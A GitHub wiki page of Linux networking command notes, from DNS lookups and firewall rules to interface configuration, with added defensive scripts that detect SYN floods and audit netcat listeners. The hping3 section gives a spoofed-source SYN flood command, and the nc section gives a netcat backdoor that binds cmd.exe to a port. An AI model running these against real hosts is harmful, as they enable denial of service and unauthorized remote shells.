Network - jasper-zanjani/dotfiles GitHub Wiki

Network

bmon

[ref][https://www.networkworld.com/video/99387/how-to-use-the-bmon-command-2-minute-linux-tips] [ref][https://www.networkworld.com/article/3447936/viewing-network-bandwidth-usage-with-bmon.html]

dig

DNS lookup tool that returns the text of the actual response from the DNS server, useful when troubleshooting a DNS issue (cf. nslookup)

Nameserver

dig example.com NS

Mail server

dig example.com MX

Perform a reverse DNS lookup on an IP address

dig -x 8.8.8.8

Specify an alternate DNS server to query

dig @8.8.8.8 example.com

Find authoritative nameservers for the zone and display SOA records

dig +nssearch example.com

Lookup the IP associated with a domain name

dig +short example.com

Look up the mail servers (MX records: preference and hostname) associated with a domain name

dig +short example.com MX

Perform iterative queries and display the entire trace path to resolve a domain name

dig +trace example.com

Request all types of records for a given domain name (many servers give only a minimal answer to ANY queries, per RFC 8482)

dig example.com ANY

Display Start of Authority information for a domain

dig example.com soa

firewall-cmd

add-port add-service get-active-zones get-default-zone get-services list-services new-zone permanent reload remove-service state

Successor to iptables in Red Hat and, like its predecessor, a frontend to the kernel's netfilter framework. Places network traffic into zones. Commands have to be written twice: once to affect the running configuration and again, with --permanent, to have the change saved.

Configuration file                           Description
/etc/sysconfig/network-scripts/ifcfg-ens33   interface settings
/usr/lib/firewalld/services                  .xml files that define services ("ZONE=public")

Add a new zone, and write the change to disk

firewall-cmd --new-zone=testlab --permanent
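
Because each change is written twice, the runtime and permanent configurations can drift apart. The following is an added example, not part of the wiki, that compares the two service lists; fw_drift is a hypothetical helper name and the sample lists are constructed.

```shell
#!/bin/sh
# Added example: report firewalld services present in only one of the
# runtime and permanent configurations.
# fw_drift is a hypothetical helper. Its two arguments are the
# space-separated outputs of:
#   firewall-cmd --list-services
#   firewall-cmd --permanent --list-services
fw_drift() {
    runtime=$1
    permanent=$2
    for svc in $runtime; do
        case " $permanent " in
            *" $svc "*) ;;
            *) echo "runtime-only: $svc (lost on reload/reboot)" ;;
        esac
    done
    for svc in $permanent; do
        case " $runtime " in
            *" $svc "*) ;;
            *) echo "permanent-only: $svc (not active until reload)" ;;
        esac
    done
}

# Constructed sample: http was added without --permanent, https was added
# with --permanent but no --reload followed.
sample_runtime="cockpit dhcpv6-client http ssh"
sample_permanent="cockpit dhcpv6-client https ssh"
fw_drift "$sample_runtime" "$sample_permanent"

# On a live host (requires firewalld):
#   fw_drift "$(firewall-cmd --list-services)" \
#            "$(firewall-cmd --permanent --list-services)"
```

An empty result means the running firewall matches what will be loaded after the next reload or reboot.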

hping3

Hping3 crafts SYN ("synchronize") packets from random spoofed IP addresses and sends them out at very short intervals. [ref][Sec+ Lab]

Option  POSIX option    Effect [ref][https://tools.kali.org/information-gathering/hping3]
-i      --interval      wait for the specified interval between packets (uX for X microseconds)
-p      --destport      destination port
-q      --quiet         quiet
-S      --syn           set the SYN flag
        --rand-source   random source address mode

hping3 192.168.0.2 -p 80 -i u10 -S -q --rand-source

ifconfig

"RX" and "TX" stand for received and transmitted.

Apply a static IP address to interface {eth0} and turn it on ("up")

ifconfig eth0 up 10.1.230.245 netmask 255.255.255.0

Bring an interface up or down

ifup eth0
ifdown eth0
ifconfig eth0 up
ifconfig eth0 down

Display details of all interfaces (even disabled)

ifconfig -a

Configure eth0 with an additional IPv6 address

ifconfig eth0 inet6 add fdd6:551:b09e::/128

Bring online all interfaces marked as auto within the networking configuration

ifup -a

ip

Newer alternative to the old ifconfig

ip addr

Show L2 status (links)

ip link

Listen for netlink messages

ip monitor 

Display routing information

ip route

Change the default gateway to 192.168.1.1 on eth0

ip route change default via 192.168.1.1 dev eth0

Turn on interface wlp2s0

sudo ip link set wlp2s0 up

iptables

A popular firewall and, like firewalld, a frontend for the kernel-level netfilter framework. (The ifconfig tool above is the interface-configuration utility used to assign a TCP/IP configuration to a network interface; it is no longer installed on modern distros.)

Config files             Description
/etc/sysconfig/iptables  location of saved config

Display the active rules in iptables-save format (the format in which they are written to disk)

iptables --list-rules

Accept SSH traffic from a particular IP

iptables -A INPUT -p tcp --dport 22 -s 10.0.222.222 -j ACCEPT

Accept incoming TCP traffic to port 80

iptables -A INPUT -p tcp --dport 80 -j ACCEPT

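Flush (delete) all rules in every chain of the filter table. This does not reload the configuration file; the saved rules in /etc/sysconfig/iptables are reapplied with iptables-restore. Chain policies are left unchanged, so with a default DROP policy a flush blocks all traffic.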

iptables -F

Show statistics for configuration lines

iptables -vnL --lines

iptables-save

iw

Show or manipulate wireless devices and their configuration; followed by dev, phy, or reg depending on the device.

Check the name of the network device [ref][Fedora Docs]

iw dev

Check the connection status of the Wi-Fi device wlp2s0

iw wlp2s0 link

iwlist

nc

The netcat utility allows testing of a host's ports, similar to ping, but more versatile because ping only uses the portless ICMP protocol. GNU and OpenBSD versions available (itp-l+: 28)

Option Effect
-l listening mode

Connect to host on port 80

nc example.com 80

Scan ports

# Scan a single port (-z: report whether the port is open without sending data)
nc -v -w 2 -z 192.168.56.1 22

# Scan multiple ports
nc -v -w 2 -z 192.168.56.1 22 80

# Scan a range of ports
nc -v -w 2 -z 192.168.56.1 22-25

Transfer files between servers. This example uses the pv utility to monitor progress. nc sends the stream unencrypted and unauthenticated.

# Run `nc` in listening mode (`-l` option) on port 3000
tar -zcf - debian-10.0.0-amd64-xfce-CD-1.iso | pv | nc -l -p 3000 -q 5

# On the receiving client, to obtain the file:
nc 192.168.1.4 3000 | pv | tar -zxf -

Create a command-line chat server

# Create chat server listening on port 5000
nc -l -vv -p 5000

# Launch a chat session on the other system
nc 192.168.56.1 5000

Find a service running on a port: obtain port banners (-n disables DNS lookup)

nc -v -n 192.168.56.110 80

Create stream sockets: create and listen on a UNIX-domain stream socket

nc -lU /var/tmp/mysocket &
ss -lpn | grep "/var/tmp/"

Create a backdoor: netcat needs to listen on a chosen port (here 3001); -d disables reading from stdin; -e specifies the command to run on the target system

nc -L -p 3001 -d -e cmd.exe

Connect to {port} at {host}

nc host port

Netcat command that retrieves a webpage

printf 'GET / HTTP/1.0\r\n\r\n' | nc host port

netstat

Options: -a -c -g -i -l -n -o -p -r -s -t -u -v -M

Show network traffic

netstat -an

Refresh every five seconds

netstat -c5

Show the current default route without performing DNS lookups on the IP addresses involved

netstat -rn

Count number of TCP connections

netstat -a | grep tcp - | wc -l

Active sessions

netstat -tp

All sessions

netstat -atp

Routing table with name resolution

netstat -r

Get the list of IPs and ports that are connected via https on your webserver every second

watch -n 1 'netstat -an | grep ":443"'

Get the total number of connections on port 80 every second

watch -n 1 'netstat -an | grep ":80" | wc -l'
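
Counting by connection state rather than by raw total is what makes the SYN traffic described under hping3 visible: with randomized source addresses every source appears once, so the useful grouping is half-open (SYN_RECV) connections per local port. The following is an added example, not part of the wiki; half_open_by_port and sample_netstat are hypothetical names and the sample output is constructed.

```shell
#!/bin/sh
# Added example: summarize half-open TCP connections from `netstat -ant`
# output read on stdin (netstat spells the state SYN_RECV).
# Prints "<local port> <half-open count> <distinct sources>" for every
# local port whose SYN_RECV count is at or above the threshold ($1).
half_open_by_port() {
    awk -v min="${1:-100}" '
        $1 ~ /^tcp/ && $6 == "SYN_RECV" {
            n = split($4, l, ":"); port = l[n]    # last field, works for IPv6
            src = $5; sub(/:[0-9]+$/, "", src)    # strip the source port
            half[port]++
            if (!((port, src) in seen)) { seen[port, src] = 1; uniq[port]++ }
        }
        END {
            for (p in half)
                if (half[p] >= min) print p, half[p], uniq[p]
        }
    ' | sort -k2,2nr
}

# Constructed sample of `netstat -ant` output (documentation addresses).
sample_netstat() {
    cat <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 192.168.0.2:80          203.0.113.7:51514       SYN_RECV
tcp        0      0 192.168.0.2:80          198.51.100.23:40112     SYN_RECV
tcp        0      0 192.168.0.2:80          192.0.2.61:1044         SYN_RECV
tcp        0      0 192.168.0.2:80          203.0.113.200:62001     SYN_RECV
tcp        0      0 192.168.0.2:80          192.0.2.10:55012        ESTABLISHED
tcp        0      0 192.168.0.2:22          192.0.2.10:55900        SYN_RECV
EOF
}

sample_netstat | half_open_by_port 3    # prints: 80 4 4

# Live use: netstat -ant | half_open_by_port 100
```

A half-open count close to the number of distinct sources, as in the sample, is the pattern randomized source addresses produce.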

nmcli

Control NetworkManager and report network status

Display devices and statuses

nmcli device status

Display information on interfaces as well as status, including other network connections not managed by network manager ("unmanaged") or not connected ("unavailable")

nmcli dev status

Display what connections are enabled

nmcli general status

Display UUIDs associated with network connections

nmcli connection show --active

Display much more information on network devices

nmcli device show

Configure settings for network interface {ens01} via interactive shell

nmcli connection edit ens01

List all connections NetworkManager has

nmcli connection show

Show settings for network interface {ens01}

nmcli device show ens01

Display currently configured hostname

nmcli general hostname

Set hostname to {hostname}

nmcli general hostname hostname

Show overall status of NetworkManager

nmcli general status

nmap

Scan hosts and ports on a network

Scan hosts from a text file

nmap -iL hosts.txt

Identify a host's operating system

nmap -A localhost.example.com

Determine whether a host has a firewall enabled

nmap -sA localhost.example.com

Scan a specified range of ports

nmap -p 10-300 localhost.example.com

Perform a SYN TCP scan, stealthier than the TCP connect scan

nmap -sS localhost.example.com

Aggressive scan

nmap -A 192.168.1.0/24

Ping scan home network (not bothering with ports)

nmap -sn 192.168.1.0/24

Fast port scan using SYN packets

nmap -sS -F 192.168.1.0/24

Port scan using SYN ("synchronize") packet, first element of TCP handshake

nmap -sS 192.168.1.0/24

Port scan using normal TCP

nmap -sT 192.168.1.0/24

Port scan using UDP

nmap -sU 192.168.1.0/24

Xmas scan

nmap -sX 192.168.1.0/24

Scan a range of IPs [ref][Sec+ Lab]

nmap 192.168.27.0/24 > hosts.txt

Identify operating system and scan ports using TCP SYN packets [ref][Sec+ Lab]

nmap -O -sS 192.168.27.0/24 > hosts.txt

nslookup

Perform a DNS lookup in an interactive shell with cleaner output than dig. Enter a domain name and you get output in two sections.

Retrieve IP address of {host}

nslookup host

Get IP address of a website

nslookup url

Get only nameservers

nslookup -type=ns url

Get only MX records

nslookup -type=mx url

Get Start of Authority (SOA) record

nslookup -type=soa url

Display all available records

nslookup -type=any url

Perform reverse DNS lookup on {ipaddress}

nslookup ipaddress

Specify port {portno} in the lookup

nslookup -port=portno url

rfkill

block list unblock

Tool for enabling and disabling wireless devices

Unblock Bluetooth, if it is blocked [ref][https://computingforgeeks.com/connect-to-bluetooth-device-from-linux-terminal/]

rfkill unblock bluetooth

route

Options: -h -n -v -C -F

ss

Options: -a -l -t -u -x

Options are of two kinds:

  1. Connection type (listening or established)
  2. Protocol type

Display numeric ports instead of service names

ss -n
ss --numeric

Display routing table: ss has no routing option (--route belongs to netstat), so use ip route

ip route

Display programs with open ports

ss --processes

Show all running servers "Tuna please"

ss -tunapl

Display all sockets with numeric addresses and ports (no name lookups)

ss -an
ss --all --numeric

Display all TCP sockets, listening and connected, with their owning processes

ss -atp
ss --all --tcp --processes

Display active TCP connections

ss -tp
ss --tcp --processes
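
A listener opened with nc (see the nc section) appears in the socket table that ss prints with its owning process. The following is an added example, not part of the wiki, that reviews `ss -tlnp` output against an allowlist of expected ports; audit_listeners and sample_ss are hypothetical names and the sample output is constructed.

```shell
#!/bin/sh
# Added example: audit `ss -tlnp` output read on stdin.
# $1 is a space-separated allowlist of expected listening ports.
# Prints "<port> <process> <reasons>" for each listener that is off the
# allowlist or owned by a netcat binary.
audit_listeners() {
    awk -v allowed=" $1 " '
        $1 == "LISTEN" {
            n = split($4, a, ":"); port = a[n]    # last field, works for [::]:port
            proc = "unknown"    # ss -p omits processes of other users unless run as root
            if (match($0, /users:\(\("[^"]+"/))
                proc = substr($0, RSTART + 9, RLENGTH - 10)
            reason = ""
            if (index(allowed, " " port " ") == 0)
                reason = "port-not-allowlisted"
            if (proc ~ /^(nc|ncat|netcat)$/)
                reason = (reason == "" ? "" : reason ",") "netcat-listener"
            if (reason != "") print port, proc, reason
        }
    '
}

# Constructed sample of `ss -tlnp` output.
sample_ss() {
    cat <<'EOF'
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128          0.0.0.0:22        0.0.0.0:*     users:(("sshd",pid=812,fd=3))
LISTEN 0      511          0.0.0.0:443       0.0.0.0:*     users:(("nginx",pid=1033,fd=6))
LISTEN 0      1            0.0.0.0:3001      0.0.0.0:*     users:(("nc",pid=4242,fd=3))
LISTEN 0      128             [::]:8080         [::]:*
EOF
}

sample_ss | audit_listeners "22 443"

# Live use (as root, so every process name is visible):
#   ss -tlnp | audit_listeners "22 443"
```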

sysctl

Disable IPv6 networking

sysctl -w net.ipv6.conf.all.disable_ipv6=1
sysctl -w net.ipv6.conf.default.disable_ipv6=1

Re-enable IPv6 networking

sysctl -w net.ipv6.conf.all.disable_ipv6=0
sysctl -w net.ipv6.conf.default.disable_ipv6=0

tcpdump

Inspect actual IP packets

All network data will be displayed to STDOUT

tcpdump -i eth0   

Set snapshot length of capture (default 65,535B)

tcpdump -i eth0 -s 65535

traceroute

Options: -f -i -n -s -t -v -w -T

ufw

Allow traffic associated with SSH, HTTP, and HTTPS

ufw allow ssh
ufw allow http
ufw allow https